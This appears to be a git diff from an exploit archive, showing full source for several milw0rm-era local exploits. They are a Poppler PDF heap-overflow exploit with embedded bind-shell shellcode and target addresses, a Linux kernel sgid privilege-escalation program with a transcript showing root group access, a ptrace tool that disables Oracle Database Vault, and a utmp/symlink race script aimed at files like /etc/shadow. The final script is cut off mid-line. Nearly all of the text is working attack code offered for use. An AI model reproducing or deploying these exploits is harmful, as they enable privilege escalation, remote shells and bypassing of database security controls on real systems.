+ self.entrypoint=entrypoint + self.chunkaddress=0 + if (self.entrypoint > 0xff - 8): + throw + +## lendian, 32bit only +## See The Malloc Maleficarum / House of Mind + def mind(self): + rslt = "" + #first we add padding to reach the next Heap border + rslt+=self.PAD*(self.heap_info-self.base) + + #now we add a _heap_info pinting to a malloc_state of our own + #and dictating a generous size for this *heap* + ##arena.c:59 //struct _heap_info + rslt += struct.pack(" unlocked. + rslt += struct.pack(" +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +# | Size of previous chunk, if allocated | | +# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +# | Size of chunk, in bytes |M|P| +# mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +# | User data starts here... . +# . . +# . (malloc_usable_size() bytes) . +# . | +#nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +# | Size of chunk | +# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + + + #chunk 0 There isn't a single reason for this to exist * wabaaaaaaaaaa! +# rslt += struct.pack(">\nstream...\nendstream\n"])) + catalog = PDFDict() + catalog.add("Type", PDFName("Catalog")) + catalog.add("Outlines", "3 0 R") + catalog.add("Pages", "4 0 R") + catalog.add("AcroForm", "<>") + + #for i in range(0,1000): + # catalog.add( "C"*82 + "%05d"%i, 0) + + outlines = PDFDict() + outlines.add("Type", PDFName("Outlines")) + outlines.add("Count",0) + + pages = PDFDict() + pages.add("Type", PDFName("Pages")) + pages.add("Kids","[ 8 0 R 6 0 R 5 0 R ]") + pages.add("Count","3") + + doc.add(PDFObject([catalog])) + doc.add(PDFObject([outlines])) + doc.add(PDFObject([pages])) + + page1 = PDFDict() + page1.add("Type", PDFName("Page")) + page1.add("Parent", "4 0 R") + page1.add("MediaBox","[ 0 0 612 792 ]") + page1.add("Contents", "1 0 R") + page1.add("Resources", "<< /ProcSet 6 0 R >>") + page1.add("Annots", "0") + + #malloc-fill-free lots of chunks of the size then used by Page class(88) + for pagesize in range(88,126): + payload = ("".join(["#%02x"%ord(struct.pack("@L",hm.chunkaddress)[i]) for i in range (0,4)]))*19 + payload += "B"*(pagesize-(len(payload)/3)) + for i in range(0,10): + page1.add(payload, 0) + + doc.add(PDFObject([page1])) + + page1 = PDFDict() + page1.add("Type", PDFName("Page")) + page1.add("Parent", "4 0 R") + page1.add("MediaBox","[ 0 0 612 792 ]") + page1.add("Contents", "1 0 R") + page1.add("Resources", "<< /ProcSet 6 0 R >>") + page1.add("Annots", "[7 0 R 7 0 R 7 0 R 7 0 R]") + + #massage session 1 + size=127 + for i in range(0,massage[0]): + page1.add( "A"*(size-5)+("%05d"%(i)), "B"*size) + + doc.add(PDFObject([page1])) + annots = PDFDict() + annots.add("Subtype","/Text") + + annots.add("BS", "<? + "0.0 "*massage[2] + " ]>>") + + annots.add("FT", "/Tx") + doc.add(PDFObject([annots])) + + page1 = PDFDict() + page1.add("Type", PDFName("Page")) + page1.add("Parent", "4 0 R") + page1.add("MediaBox","[ 0 0 612 792 ]") + page1.add("Contents", "1 0 R") + page1.add("Resources", "<< /ProcSet 6 0 R >>") + page1.add("Annots", "[7 0 R]") + doc.add(PDFObject([page1])) + doc.add(PDFObject(["<<>>"])) + doc.add(PDFObject(["[ /PDF ]"])) + return doc.__str__() + + +##Main +## Not every shellcode will work by now +## Only the ones that taken by 8bytes form an ieee754 double presicion float +## with an exponent not too positive ... :) + +## linux_ia32_bind - LPORT=4444 Size=84 Encoder=None http://metasploit.com +scode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +scode += "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +scode += "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +scode += "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" +scode += "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" +scode += "\x89\xe1\xcd\x80" + +#expl = PopplerExpl( ('\xcc'+'\x90')*((160-16)/2)) +expl = PopplerExpl(scode) + +targets = { + "gentoo-pdftotext":(0x08100000, 0x804c014, 1863, 20, 400), + "debian4-pdftotext":(0x08100000, 0x804bb18, 1879, 33, 400), + "gentoo-evince-thumbnailer": (0x8100000, 0x080712c4, 907, 34, 200), + +} + +if len( sys.argv )==1: + print "Comments -> fmanzano@fceia.unr.edu.ar" + print "Usage 1:" + print " %s "%sys.argv[0], targets.keys() + print "Usage 2:" + print " %s massage1 massage2 massage3 base got"%sys.argv[0] + print " The idea here is to align the _heap_info struct that commences with 0x08?00010 " + print " to the address 0x8?0000. For this pourpose move massage1/2/3. " + print " THIS STUPIDLY SIMPLE METHOD WOULD WORK FOR VERY FEW APPS !" + print " base is the 1024*1024 bytes aligned address to which we are trying to align everything" + print " got is the addres of the got where the thing is going to write the shellcode address" + print " BTW by now the shellcode is nop;int 3;nop...grooovy!.. NOT" +elif len( sys.argv )>2: + print expl.make(int(sys.argv[4][2:],16), int(sys.argv[5][2:],16), (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))) +else: + #base: the expected heap limit (08100000,08200000,....08f00000... ) + #got: address of the got entry to change + #chinesse massage + base,got,massage1,massage2,massage3 = targets[sys.argv[1]] + print expl.make(base,got,(massage1,massage2,massage3)) + +# milw0rm.com [2008-07-08] diff --git a/platforms/linux/local/624.c b/platforms/linux/local/624.c index 0c016d5c0..24a3e3a90 100755 --- a/platforms/linux/local/624.c +++ b/platforms/linux/local/624.c @@ -157,6 +157,6 @@ int fd, nl, pid; unlink(BADNAME); return 0; -} - -// milw0rm.com [2004-11-10] +} + +// milw0rm.com [2004-11-10] diff --git a/platforms/linux/local/657.c b/platforms/linux/local/657.c index cdec745e0..9330b1792 100755 --- a/platforms/linux/local/657.c +++ b/platforms/linux/local/657.c @@ -371,6 +371,6 @@ int main(int argc, char *argv[]) { printf("Kazdemu trafi sie gowno...!\n"); return 0; } -} - -// milw0rm.com [2004-11-25] +} + +// milw0rm.com [2004-11-25] diff --git a/platforms/linux/local/669.c b/platforms/linux/local/669.c index 64c3acc94..5524b63db 100755 --- a/platforms/linux/local/669.c +++ b/platforms/linux/local/669.c @@ -127,6 +127,6 @@ sh-2.05b# ************************************************************ thats all . have fun ! -*/ - -// milw0rm.com [2004-12-01] +*/ + +// milw0rm.com [2004-12-01] diff --git a/platforms/linux/local/6851.c b/platforms/linux/local/6851.c index cb1ffe9bf..9956f0809 100755 --- a/platforms/linux/local/6851.c +++ b/platforms/linux/local/6851.c @@ -1,88 +1,88 @@ -/* -gw-ftrex.c: - -Linux kernel < 2.6.22 open/ftruncate local exploit -by - -bug information: -http://osvdb.org/49081 - - -!!!This is for educational purposes only!!! - -To use it, you've got to find a sgid directory you've got -permissions to write into (obviously world-writable), e.g: -find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx" -which fortunately is not common those days :) -And also a shell that does not drop sgid privs upon execution (like ash/sash). -E.g: - -test:/fileserver/samba$ ls -ld -drwxrwsrwx 2 root root 4096 2008-10-27 16:27. -test:/fileserver/samba$ id -uid=33(www-data) gid=33(www-data) groups=33(www-data) -test:/fileserver/samba$ /tmp/gw-ftrex -ash shell found! -size=80200 -We're evil evil evil! - -$ id -uid=33(www-data) gid=33(www-data) egid=0(root) groups=33(www-data) - -Trqbva da kaja neshto umno kato zakliuchenie...ma sega ne moga da se setia. -*/ - - - -#include -#include -#include -#include - -int main(int argc, char *argv[]) -{ -char *buf=malloc(3096*1024); //3mb just to be sure -int a,len; -int fd,fd1; -char *buf1; -int shell=0; - - -if (stat("/bin/ash",buf)==0) -{ - printf("ash shell found!\n"); - shell=1; -} - -if (shell==0) if (stat("/bin/sash",buf)==0) -{ - printf("sash shell found!\n"); - shell=1; -} - -if (shell==0) -{ - printf("no suitable shell found (one that does not drop sgid permissions) :(\n"); - exit(2); -} - - -len=0; -if (shell==1) fd=open("/bin/ash",O_RDONLY); -if (shell==2) fd=open("/bin/sash",O_RDONLY); - -while (read(fd,buf+len,1)) len++; - -printf("size=%d\n",len); -fd1=open(".evilsploit",O_RDWR | O_CREAT | O_EXCL, 02750); -ftruncate(fd1, len); -buf1 = mmap(NULL, len, PROT_WRITE | PROT_EXEC, MAP_SHARED, fd1, 0); -memcpy(buf1,buf,len); -munmap(buf1,len); -close(fd1);close(fd); -free(buf); -printf("We're evil evil evil!\n\n"); -execv(".evilsploit", NULL); -} - -// milw0rm.com [2008-10-27] +/* +gw-ftrex.c: + +Linux kernel < 2.6.22 open/ftruncate local exploit +by + +bug information: +http://osvdb.org/49081 + + +!!!This is for educational purposes only!!! + +To use it, you've got to find a sgid directory you've got +permissions to write into (obviously world-writable), e.g: +find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx" +which fortunately is not common those days :) +And also a shell that does not drop sgid privs upon execution (like ash/sash). +E.g: + +test:/fileserver/samba$ ls -ld +drwxrwsrwx 2 root root 4096 2008-10-27 16:27. +test:/fileserver/samba$ id +uid=33(www-data) gid=33(www-data) groups=33(www-data) +test:/fileserver/samba$ /tmp/gw-ftrex +ash shell found! +size=80200 +We're evil evil evil! + +$ id +uid=33(www-data) gid=33(www-data) egid=0(root) groups=33(www-data) + +Trqbva da kaja neshto umno kato zakliuchenie...ma sega ne moga da se setia. +*/ + + + +#include +#include +#include +#include + +int main(int argc, char *argv[]) +{ +char *buf=malloc(3096*1024); //3mb just to be sure +int a,len; +int fd,fd1; +char *buf1; +int shell=0; + + +if (stat("/bin/ash",buf)==0) +{ + printf("ash shell found!\n"); + shell=1; +} + +if (shell==0) if (stat("/bin/sash",buf)==0) +{ + printf("sash shell found!\n"); + shell=1; +} + +if (shell==0) +{ + printf("no suitable shell found (one that does not drop sgid permissions) :(\n"); + exit(2); +} + + +len=0; +if (shell==1) fd=open("/bin/ash",O_RDONLY); +if (shell==2) fd=open("/bin/sash",O_RDONLY); + +while (read(fd,buf+len,1)) len++; + +printf("size=%d\n",len); +fd1=open(".evilsploit",O_RDWR | O_CREAT | O_EXCL, 02750); +ftruncate(fd1, len); +buf1 = mmap(NULL, len, PROT_WRITE | PROT_EXEC, MAP_SHARED, fd1, 0); +memcpy(buf1,buf,len); +munmap(buf1,len); +close(fd1);close(fd); +free(buf); +printf("We're evil evil evil!\n\n"); +execv(".evilsploit", NULL); +} + +// milw0rm.com [2008-10-27] diff --git a/platforms/linux/local/695.c b/platforms/linux/local/695.c index 7042de2f1..754c3ea69 100755 --- a/platforms/linux/local/695.c +++ b/platforms/linux/local/695.c @@ -34,6 +34,6 @@ main(int ac, char *av[]) { } return 0; -} - -// milw0rm.com [2004-12-17] +} + +// milw0rm.com [2004-12-17] diff --git a/platforms/linux/local/71.c b/platforms/linux/local/71.c index 1c292e058..3f54feeac 100755 --- a/platforms/linux/local/71.c +++ b/platforms/linux/local/71.c @@ -72,6 +72,6 @@ setenv ("HOME", out, 1); banner (); execl (BIN, BIN, "-scores", 0x0); // the switch "-scores" is necessary to exploit the game -} - -// milw0rm.com [2003-07-31] +} + +// milw0rm.com [2003-07-31] diff --git a/platforms/linux/local/7177.c b/platforms/linux/local/7177.c index 98494eac5..cc75bb935 100755 --- a/platforms/linux/local/7177.c +++ b/platforms/linux/local/7177.c @@ -1,301 +1,301 @@ -/* - * original release: http://vnull.pcnet.com.pl/blog/?p=92 - * - * ora_dv_mem_off.c version 0x1 - * ORACLE Database Vault runtime disabler (x86_32 Linux only) - * AKA give_back_the_freedom - * by Jakub 'vnull' Wartak 26.02.2008 - * 0-day PRIVATE! D0 N0T DI$TRIBUT3! - * - * Tested on 10.2.0.3, CentOS 5. - * For other architectures/OS combos consider having fun with gdb ;] - * - * Whole Database Vault architecture is flawed if DBA has access to - * oracle user process space. IMHO you could limit risk by creating - * UNIX accounts for DBAs with membership of OSDBA group (along with - * oracle SUID binary and shared memory with only read permission - * for OSDBA group [check SHM privs: ipcs -cm] ). But how those DBAs - * would cope with some serious crashes (requiring for e.g. restoring - * controlfile) ? - * - * Usage: - * Set enviorniment variables: ORACLE_BASE, ORACLE_SID, ORACLE_HOME - * $ gcc -Wall ora_dv_mem_off.c -o ora_dv_mem_off -lbfd -liberty - * $ ./ora_dv_mem_off - * - * REQUIEREMENTS: - * + run as oracle process owner (by default "oracle") - * + working ptrace(), it won't work in systems with ptrace() - * disabled (grsecurity and some LKMs). - * + BFD headers and library (binutils-devel) - * - * THE DOCUMENT IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. THE - * CONTENT MAY CHANGE WITHOUT NOTICE. IN NO EVENT SHALL THE AUTHORS BE - * LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES, INJURIES, - * LOSSES OR UNLAWFUL OFFENCES. - * - * USE AT OWN RISK! - * - */ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include /* for __NR_clone */ - -/* you may need to alter this */ -#define ORABASE "/u01/app/oracle/product/10.2.0/bin" - -/* - * Magic... (at&t syntax) - * push %ebp - * mov %esp, %ebp - * mov , %eax - * [..] - * where DV_FLAG is 32-bit long - */ -#define ASM_DV_FUNC_PROLOG "\x55\x8b\xec\xb8" - -const char *sqlplus = ORABASE "/sqlplus"; -const char *oracle = ORABASE "/oracle"; -const int long_size = sizeof(long); -pid_t child; - -long locate_dv_func(void) -{ - asymbol **symbol_table; - bfd *b = bfd_openr(oracle, NULL); - if (b == NULL) { - perror("bfd_openr"); - exit(-1); - } - - bfd_check_format(b, bfd_object); - long storage_needed = bfd_get_symtab_upper_bound(b); - if(storage_needed < 0) { - fprintf(stderr, "wtf?!\n"); - exit(-1); - } - - if((symbol_table = (asymbol**)malloc(storage_needed)) == 0) { - perror("malloc"); - exit(-1); - } - - int num_symbols; - if((num_symbols = bfd_canonicalize_symtab(b, symbol_table)) <= 0) { - fprintf(stderr, "no symbols info\n"); - exit(-1); - } - - int i; - for(i = 0; i < num_symbols; i++) { - char *symname = bfd_asymbol_name(symbol_table[i]); - void *symaddr = bfd_asymbol_value(symbol_table[i]); - /* don't even ask why this funciton, for real hardcore: gdb -p */ - if(!strcmp(symname, "kzvtins")) { - fprintf(stderr, "[%d] symbol \"kzvtins\" at 0x%lx\n", getpid(), - (long) symaddr); - return (long) symaddr; - } - } - - return 0; -} - -/* from "Playing with ptrace(), part#2, Linux Journal, author: Pradeep Padala */ -void getdata(pid_t child, long addr, char *str, int len) -{ - char *laddr; - int i, j; - union u { - long val; - char chars[long_size]; - } data; - i = 0; - j = len / long_size; - laddr = str; - while(i < j) { - data.val = ptrace(PTRACE_PEEKDATA, child, addr + i * 4, NULL); - memcpy(laddr, data.chars, long_size); - ++i; - laddr += long_size; - } - j = len % long_size; - if(j != 0) { - data.val = ptrace(PTRACE_PEEKDATA,child, addr + i * 4,NULL); - memcpy(laddr, data.chars, j); - } - str[len] = '\0'; -} - -void putdata(pid_t child, long addr, char *str, int len) -{ - char *laddr; - int i, j; - union u { - long val; - char chars[long_size]; - } data; - i = 0; - j = len / long_size; - laddr = str; - while(i < j) { - memcpy(data.chars, laddr, long_size); - ptrace(PTRACE_POKEDATA, child, addr + i * 4, data.val); - ++i; - laddr += long_size; - } - j = len % long_size; - if(j != 0) { - memcpy(data.chars, laddr, j); - ptrace(PTRACE_POKEDATA, child, addr + i * 4, data.val); - } -} - -void cleanup(void) -{ - int s; - kill(child, SIGKILL); - wait(&s); -} - -int main(int ac, char **av) -{ - int status; - pid_t orapid = 0; - - bfd_init(); - - if((child = fork()) == -1) { - perror("fork"); - exit(-1); - } - - if(child == 0) { - if(ptrace(PTRACE_TRACEME, 0, NULL, NULL)==-1) { - perror("unable to ptrace(PTRACE_TRACEME)"); - exit(-1); - } - - /* launch sqlplus */ - if(execl(sqlplus, "sqlplus", "/nolog", NULL)==-1) { - perror("execl"); - exit(-1); - } - - /* not reached */ - exit(0); - } - - if(atexit(cleanup) != 0) { - fprintf(stderr, "[%d] unable to register cleanup function\n", getpid()); - } - - wait(&status); - if(WIFSTOPPED(status)) { - fprintf(stderr, "[%d] starting to trace sqlplus process (%d)\n", getpid(), child); - } - - fprintf(stderr, "[***] NOW TYPE IN SQLPLUS: conn / as sysdba\n"); - - while(!orapid) { - struct user_regs_struct uregs; - - ptrace(PTRACE_SYSCALL, child, 0, 0); - wait(&status); - ptrace(PTRACE_GETREGS, child, 0, &uregs); - - /* ouch! no fork()? clone()! */ - if(uregs.orig_eax==__NR_clone) { - long *regs = 0; - - /* fprintf(stderr, "[%d] clone() syscall\n", getpid()); */ - ptrace(PTRACE_SYSCALL, child, 0, 0); - wait(&status); - if((orapid = ptrace(PTRACE_PEEKUSER, child, ®s[EAX], 0)) == -1) { - perror("ptrace(PTRACE_PEEKUSER): unable to get clone() retvalue\n"); - exit(-1); - } - fprintf(stderr, "[%d] clone() syscall in %d, tracing orapid=%d\n", getpid(), - child, orapid); - - /* attach to orapid, detach from sqlplus */ - if(ptrace(PTRACE_ATTACH, orapid, 0, 0) == -1) { - perror("ptrace(PTRACE_ATTACH) to orapid"); - exit(-1); - } - - while(1) { - ptrace(PTRACE_SYSCALL, orapid, 0, 0); - wait(&status); - ptrace(PTRACE_GETREGS, orapid, 0, &uregs); - if(uregs.orig_eax==__NR_execve) { - fprintf(stderr, "[%d] execve() syscall in %d, \n", getpid(), orapid); - /* end ptrace of syscall */ - ptrace(PTRACE_SYSCALL, orapid, 0, 0); - break; - } else { - //fprintf(stderr, "got %ld\n", uregs.orig_eax); - ptrace(PTRACE_SYSCALL, orapid, 0, 0); - } - } - - if(ptrace(PTRACE_DETACH, child, 0, 0) == -1) { - perror("ptrace(PTRACE_DETACH) from child"); - exit(-1); - } - - } else if(uregs.orig_eax==__NR_execve) { - fprintf(stderr, "[%d] execve() syscall in %d\n", getpid(), child); - } - } - - /* now we have oracle server process under our control :) */ - long dv_func = locate_dv_func(); - if(dv_func == 0) { - fprintf(stderr, "ERROR: unable to find function\n"); - exit(-1); - } - wait(&status); - - unsigned char buf[32]; - memset(buf, 0, sizeof(buf)); - getdata(orapid, dv_func, (char *)&buf, 32); - - /* dump opcodes */ - /* - for(i = 0; i < 31; i++) { - fprintf(stderr, "%x ", (unsigned char)buf[i]); - } */ - - if(!memcmp(buf, ASM_DV_FUNC_PROLOG, strlen(ASM_DV_FUNC_PROLOG))) { - unsigned char dv_status; - unsigned long woff = dv_func + strlen(ASM_DV_FUNC_PROLOG), woff2=woff; - - getdata(orapid, woff, (char *)&dv_status, 1); - fprintf(stderr, "[***] sucessfuly validated function, DatabaseVault=%d\n", dv_status); - fprintf(stderr, "[***] attempting to rewrite memory at 0x%lx\n", woff2); - - unsigned char my = 0; - putdata(orapid, woff2, (void *)&my, 1); - } - - if(ptrace(PTRACE_DETACH, orapid, 0, 0) == -1) { - perror("ptrace(PTRACE_DETACH) from orapid"); - exit(-1); - } - - wait(&status); - exit(0); -} - -// milw0rm.com [2008-11-20] +/* + * original release: http://vnull.pcnet.com.pl/blog/?p=92 + * + * ora_dv_mem_off.c version 0x1 + * ORACLE Database Vault runtime disabler (x86_32 Linux only) + * AKA give_back_the_freedom + * by Jakub 'vnull' Wartak 26.02.2008 + * 0-day PRIVATE! D0 N0T DI$TRIBUT3! + * + * Tested on 10.2.0.3, CentOS 5. + * For other architectures/OS combos consider having fun with gdb ;] + * + * Whole Database Vault architecture is flawed if DBA has access to + * oracle user process space. IMHO you could limit risk by creating + * UNIX accounts for DBAs with membership of OSDBA group (along with + * oracle SUID binary and shared memory with only read permission + * for OSDBA group [check SHM privs: ipcs -cm] ). But how those DBAs + * would cope with some serious crashes (requiring for e.g. restoring + * controlfile) ? + * + * Usage: + * Set enviorniment variables: ORACLE_BASE, ORACLE_SID, ORACLE_HOME + * $ gcc -Wall ora_dv_mem_off.c -o ora_dv_mem_off -lbfd -liberty + * $ ./ora_dv_mem_off + * + * REQUIEREMENTS: + * + run as oracle process owner (by default "oracle") + * + working ptrace(), it won't work in systems with ptrace() + * disabled (grsecurity and some LKMs). + * + BFD headers and library (binutils-devel) + * + * THE DOCUMENT IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. THE + * CONTENT MAY CHANGE WITHOUT NOTICE. IN NO EVENT SHALL THE AUTHORS BE + * LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES, INJURIES, + * LOSSES OR UNLAWFUL OFFENCES. + * + * USE AT OWN RISK! + * + */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include /* for __NR_clone */ + +/* you may need to alter this */ +#define ORABASE "/u01/app/oracle/product/10.2.0/bin" + +/* + * Magic... (at&t syntax) + * push %ebp + * mov %esp, %ebp + * mov , %eax + * [..] + * where DV_FLAG is 32-bit long + */ +#define ASM_DV_FUNC_PROLOG "\x55\x8b\xec\xb8" + +const char *sqlplus = ORABASE "/sqlplus"; +const char *oracle = ORABASE "/oracle"; +const int long_size = sizeof(long); +pid_t child; + +long locate_dv_func(void) +{ + asymbol **symbol_table; + bfd *b = bfd_openr(oracle, NULL); + if (b == NULL) { + perror("bfd_openr"); + exit(-1); + } + + bfd_check_format(b, bfd_object); + long storage_needed = bfd_get_symtab_upper_bound(b); + if(storage_needed < 0) { + fprintf(stderr, "wtf?!\n"); + exit(-1); + } + + if((symbol_table = (asymbol**)malloc(storage_needed)) == 0) { + perror("malloc"); + exit(-1); + } + + int num_symbols; + if((num_symbols = bfd_canonicalize_symtab(b, symbol_table)) <= 0) { + fprintf(stderr, "no symbols info\n"); + exit(-1); + } + + int i; + for(i = 0; i < num_symbols; i++) { + char *symname = bfd_asymbol_name(symbol_table[i]); + void *symaddr = bfd_asymbol_value(symbol_table[i]); + /* don't even ask why this funciton, for real hardcore: gdb -p */ + if(!strcmp(symname, "kzvtins")) { + fprintf(stderr, "[%d] symbol \"kzvtins\" at 0x%lx\n", getpid(), + (long) symaddr); + return (long) symaddr; + } + } + + return 0; +} + +/* from "Playing with ptrace(), part#2, Linux Journal, author: Pradeep Padala */ +void getdata(pid_t child, long addr, char *str, int len) +{ + char *laddr; + int i, j; + union u { + long val; + char chars[long_size]; + } data; + i = 0; + j = len / long_size; + laddr = str; + while(i < j) { + data.val = ptrace(PTRACE_PEEKDATA, child, addr + i * 4, NULL); + memcpy(laddr, data.chars, long_size); + ++i; + laddr += long_size; + } + j = len % long_size; + if(j != 0) { + data.val = ptrace(PTRACE_PEEKDATA,child, addr + i * 4,NULL); + memcpy(laddr, data.chars, j); + } + str[len] = '\0'; +} + +void putdata(pid_t child, long addr, char *str, int len) +{ + char *laddr; + int i, j; + union u { + long val; + char chars[long_size]; + } data; + i = 0; + j = len / long_size; + laddr = str; + while(i < j) { + memcpy(data.chars, laddr, long_size); + ptrace(PTRACE_POKEDATA, child, addr + i * 4, data.val); + ++i; + laddr += long_size; + } + j = len % long_size; + if(j != 0) { + memcpy(data.chars, laddr, j); + ptrace(PTRACE_POKEDATA, child, addr + i * 4, data.val); + } +} + +void cleanup(void) +{ + int s; + kill(child, SIGKILL); + wait(&s); +} + +int main(int ac, char **av) +{ + int status; + pid_t orapid = 0; + + bfd_init(); + + if((child = fork()) == -1) { + perror("fork"); + exit(-1); + } + + if(child == 0) { + if(ptrace(PTRACE_TRACEME, 0, NULL, NULL)==-1) { + perror("unable to ptrace(PTRACE_TRACEME)"); + exit(-1); + } + + /* launch sqlplus */ + if(execl(sqlplus, "sqlplus", "/nolog", NULL)==-1) { + perror("execl"); + exit(-1); + } + + /* not reached */ + exit(0); + } + + if(atexit(cleanup) != 0) { + fprintf(stderr, "[%d] unable to register cleanup function\n", getpid()); + } + + wait(&status); + if(WIFSTOPPED(status)) { + fprintf(stderr, "[%d] starting to trace sqlplus process (%d)\n", getpid(), child); + } + + fprintf(stderr, "[***] NOW TYPE IN SQLPLUS: conn / as sysdba\n"); + + while(!orapid) { + struct user_regs_struct uregs; + + ptrace(PTRACE_SYSCALL, child, 0, 0); + wait(&status); + ptrace(PTRACE_GETREGS, child, 0, &uregs); + + /* ouch! no fork()? clone()! */ + if(uregs.orig_eax==__NR_clone) { + long *regs = 0; + + /* fprintf(stderr, "[%d] clone() syscall\n", getpid()); */ + ptrace(PTRACE_SYSCALL, child, 0, 0); + wait(&status); + if((orapid = ptrace(PTRACE_PEEKUSER, child, ®s[EAX], 0)) == -1) { + perror("ptrace(PTRACE_PEEKUSER): unable to get clone() retvalue\n"); + exit(-1); + } + fprintf(stderr, "[%d] clone() syscall in %d, tracing orapid=%d\n", getpid(), + child, orapid); + + /* attach to orapid, detach from sqlplus */ + if(ptrace(PTRACE_ATTACH, orapid, 0, 0) == -1) { + perror("ptrace(PTRACE_ATTACH) to orapid"); + exit(-1); + } + + while(1) { + ptrace(PTRACE_SYSCALL, orapid, 0, 0); + wait(&status); + ptrace(PTRACE_GETREGS, orapid, 0, &uregs); + if(uregs.orig_eax==__NR_execve) { + fprintf(stderr, "[%d] execve() syscall in %d, \n", getpid(), orapid); + /* end ptrace of syscall */ + ptrace(PTRACE_SYSCALL, orapid, 0, 0); + break; + } else { + //fprintf(stderr, "got %ld\n", uregs.orig_eax); + ptrace(PTRACE_SYSCALL, orapid, 0, 0); + } + } + + if(ptrace(PTRACE_DETACH, child, 0, 0) == -1) { + perror("ptrace(PTRACE_DETACH) from child"); + exit(-1); + } + + } else if(uregs.orig_eax==__NR_execve) { + fprintf(stderr, "[%d] execve() syscall in %d\n", getpid(), child); + } + } + + /* now we have oracle server process under our control :) */ + long dv_func = locate_dv_func(); + if(dv_func == 0) { + fprintf(stderr, "ERROR: unable to find function\n"); + exit(-1); + } + wait(&status); + + unsigned char buf[32]; + memset(buf, 0, sizeof(buf)); + getdata(orapid, dv_func, (char *)&buf, 32); + + /* dump opcodes */ + /* + for(i = 0; i < 31; i++) { + fprintf(stderr, "%x ", (unsigned char)buf[i]); + } */ + + if(!memcmp(buf, ASM_DV_FUNC_PROLOG, strlen(ASM_DV_FUNC_PROLOG))) { + unsigned char dv_status; + unsigned long woff = dv_func + strlen(ASM_DV_FUNC_PROLOG), woff2=woff; + + getdata(orapid, woff, (char *)&dv_status, 1); + fprintf(stderr, "[***] sucessfuly validated function, DatabaseVault=%d\n", dv_status); + fprintf(stderr, "[***] attempting to rewrite memory at 0x%lx\n", woff2); + + unsigned char my = 0; + putdata(orapid, woff2, (void *)&my, 1); + } + + if(ptrace(PTRACE_DETACH, orapid, 0, 0) == -1) { + perror("ptrace(PTRACE_DETACH) from orapid"); + exit(-1); + } + + wait(&status); + exit(0); +} + +// milw0rm.com [2008-11-20] diff --git a/platforms/linux/local/7313.sh b/platforms/linux/local/7313.sh index ab63d1407..1424b9180 100755 --- a/platforms/linux/local/7313.sh +++ b/platforms/linux/local/7313.sh @@ -1,98 +1,98 @@ -#!/bin/bash - - -echo ' - #include - #include - #include - #include - #include - #include - - int main(int argc, char *argv[]) - { - struct utmp entry; - int i; - - entry.ut_type=LOGIN_PROCESS; - strcpy(entry.ut_line,"/tmp/x"); - entry.ut_time=0; - strcpy(entry.ut_user,"badguy"); - strcpy(entry.ut_host,"badhost"); - entry.ut_addr=0; - for(i=1;i<9;i++) { - entry.ut_pid=(pid_t)( i + (int)getpid() ); - sprintf(entry.ut_id,"bad%d",i); - pututline(&entry); - } - } -' > /tmp/fillutmp.c - -cc -o /tmp/fillutmp /tmp/fillutmp.c - -echo 'Ask someone with group utmp privileges to do:' -echo ' chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp' -echo -n 'Press [RETURN] to continue... ' -read ANS - -echo ' - #include - - int main(int argc, char *argv[]) - { - while(1) - { - unlink("/tmp/x"); - symlink(argv[1],"/tmp/x"); - unlink("/tmp/x"); - symlink(argv[2],"/tmp/x"); - } - } -' > /tmp/jigglelnk.c - -cc -o /tmp/jigglelnk /tmp/jigglelnk.c - -HOST=`hostname` # or simply localhost? -echo "Which tty do you think a 'telnet $HOST' will use next?" -echo "(Do that telnet and see...)" -read TTY -echo "You said it will be '$TTY' ..." - -ATK=/etc/debian_version # should be /etc/shadow - -echo "Starting symlink re-jiggler ..." -/tmp/jigglelnk $TTY $ATK & -JIG=$! - -LOOP=0 -while :; do - ((LOOP = $LOOP + 1)) - echo; echo; echo "Try = $LOOP" - - /tmp/fillutmp - - echo "Telnetting... if login succeeds, just exit for next try..." - /usr/bin/telnet $HOST - - LS=`ls -ld $ATK` - case "$LS" in - *root*root* ) ;; # not done yet... - * ) - echo; echo - echo "Success after $LOOP tries!" - echo "$LS" - echo; echo - break - ;; - esac -done - -kill $JIG -rm /tmp/fillutmp /tmp/jigglelnk /tmp/x - -# ... -# ~$ logout -# Connection closed by foreign host. -# Success after 12 tries! -# -rw------- 1 psz tty 4 Oct 28 2006 /etc/debian_version - -# milw0rm.com [2008-12-01] +#!/bin/bash - + +echo ' + #include + #include + #include + #include + #include + #include + + int main(int argc, char *argv[]) + { + struct utmp entry; + int i; + + entry.ut_type=LOGIN_PROCESS; + strcpy(entry.ut_line,"/tmp/x"); + entry.ut_time=0; + strcpy(entry.ut_user,"badguy"); + strcpy(entry.ut_host,"badhost"); + entry.ut_addr=0; + for(i=1;i<9;i++) { + entry.ut_pid=(pid_t)( i + (int)getpid() ); + 